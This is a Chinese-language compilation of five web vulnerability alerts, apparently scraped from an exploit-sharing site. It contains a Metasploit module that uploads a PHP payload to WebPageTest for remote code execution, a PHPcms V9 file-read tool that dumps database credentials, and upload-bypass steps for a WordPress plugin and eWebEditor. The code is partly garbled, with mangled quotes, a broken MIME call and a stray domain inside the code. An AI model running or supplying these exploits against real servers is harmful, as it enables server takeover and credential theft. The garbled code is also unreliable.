以下是小编为大家准备的WebPageTest任意php文件上传漏洞预警,本文共5篇,仅供参考,大家一起来看看吧。本文原稿由网友“万川人”提供。
篇1:WebPageTest任意php文件上传漏洞预警
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' =>“WebPageTest Arbitrary PHP File Upload”,
'Description' =>%q{
This module exploits a vulnerability found in WebPageTest's Upload Feature. By
default, the resultimage.phpfile does not verify the user-supplied item before
saving it to disk, and then places this item in the web directory accessable by
remote users. This flaw can be abused to gain remote code execution.
},
'License' =>MSF_LICENSE,
'Author' =>
[
'dun', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '83822'],
['EDB', '19790']
],
'Payload' =>
{
'BadChars' =>“\\x00”
},
'DefaultOptions' =>
{
'ExitFunction' =>“none”
},
'Platform' =>['php'],
'Arch' =>ARCH_PHP,
'Targets' =>
[
['WebPageTest v2.6 or older', {}]
],
'Privileged' =>false,
'DisclosureDate' =>“Jul 13 ”,
'DefaultTarget' =>0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
], self.class)
end
def check
peer = “#{rhost}:#{rport}”
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname(“#{target_uri.path}.”)
res1 = send_request_raw({'uri'=>“#{base}/index.php”})
res2 = send_request_raw({'uri'=>“#{base}/work/resultimage.php”})
if res1 and res1.body =~ /WebPagetest \\- Website Performance and Optimization Test/ and
res2 and res2.code == 200
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def on_new_session(cli)
if cli.type != “meterpreter”
print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)
return
end
cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)
cli.fs.file.rm(@target_path)
print_status(“#{@target_path} removed”)
end
def exploit
peer = “#{rhost}:#{rport}”
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname(“#{target_uri.path}.”)
p = payload.encoded
fname = “blah.php”
data = Rex::MIME::Message.new
data.add_part(
“
'multipart/form-data', #Content Type
nil, #Transfer Encoding
”form-data; name=\\“file\\”; filename=\\“#{fname}\\”“ #Content Disposition
)
print_status(”#{peer} - Uploading payload (#{p.length.to_s} bytes)...“)
res = send_request_cgi({
'method' =>'POST',
'uri' =>”#{base}/work/resultimage.php“,
'ctype' =>”multipart/form-data; boundary=#{data.bound}“,
'data' =>data.to_s
})
if not res
print_error(”#{peer} - No response from host“)
return
end www.xxxxo.com
@target_path = ”#{base}/results/#{fname}“
print_status(”#{peer} - Requesting #{@target_path}“)
res = send_request_cgi({'uri'=>@target_path})
handler
if res and res.code == 404
print_error(”#{peer} - Payload failed to upload“)
end
end
end
篇2:eWebeditoR3.8 for php任意文件上传EXP漏洞预警
eWebeditoR3.8 for php任意文件上EXP
URL:
file:
漏洞修补方法:
初始化数组$aStyle
$sUsername = ”admin“;
$sPassword = ”admin“;
$aStyle. = array();
$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1“;
篇3:WordPress Front End Upload v0.5.4.4任意php文件上传漏洞预警
标题: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
作者: Chris Kellum
主页: mondaybynoon.com/
软件地址: downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip
影响版本: 0.5.4.4
缺陷分析
=====================
Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format:
filename.php.jpg
Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed.
In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access.
Example:
www.xxxx.com/wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/
However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload.
篇4:phpcms v9 任意文件读取漏洞exp漏洞预警
/**
* PHPcms V9 任意文件读取漏洞检测工具
* @author Return Blog: www.creturn.com
* Email: master@creturn.com
*
* 注意本程序仅供学习参考,不得用于非法互动
* 否则后果自负,与本人无关!
*/
function showInfo {
print '
***********************************************
* PHPcmsV9 Read All File ExpTool By: Return
*
* Blog: www.creturn.com
*
* Email:master@creturn.com
*
* Example: php exp.php wwww.phpcms.cn
***********************************************
';
}
$exp = '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php';
//file_get_contents(''.$exp);
if(count($argv) < 2){
showInfo();
}else{
$exp = ''.$argv[1].$exp;
$data = @file_get_contents($exp);
@file_put_contents('expDatabase.php', $data);
if(strstr($data,'')){
showInfo();
echo 'Not found !';
exit();
};
$database = include 'expDatabase.php';
showInfo();
$out = 'HostName: '.$database['default']['hostname'].”\\n“;
$out .='DataBase:'. $database['default']['database'].”\\n“;
$out .='UserName:'. $database['default']['username'].”\\n“;
$out .='Password:'. $database['default']['password'].”\\n“;
if(!empty($database)){
echo ”Found it! :\\n\\n“;
echo $out;
}
@unlink('expDatabase.php');
}
篇5:ewebeditor for php任意文件上传漏洞
此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞,PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:
$sUsername = ”admin“;
$sPassword = ”admin“;
$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1“;
........
它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。
这漏洞成因很简单,下面给个exp
URL:
file:
漏洞修补方法:
初始化数组$aStyle
$sUsername = ”admin“;
$sPassword = ”admin“;
$aStyle. = array();
$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1\";
- 企业SEO专业网站漏洞及修复漏洞预警2025-01-26
- 正方高校教务管理系统漏洞修复漏洞预警2022-12-11
- 魔方网络摄影系统注入漏洞及利用漏洞预警2022-12-15
- 给个拿微尔程序的站的方法漏洞预警2023-09-13
- 启航通信企业建站CMS系统v1.1 0day漏洞预警2023-02-02
- 快捷留言簿v10.09 正式版上传漏洞和Cookie欺骗漏洞漏洞预警2022-12-20
- PHP代码网站防范SQL注入漏洞攻击的建议WEB安全2023-06-19
- phpcms本地文件包括及利用(执行任意SQL脚本)和修复2022-12-11
- 南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警2025-01-25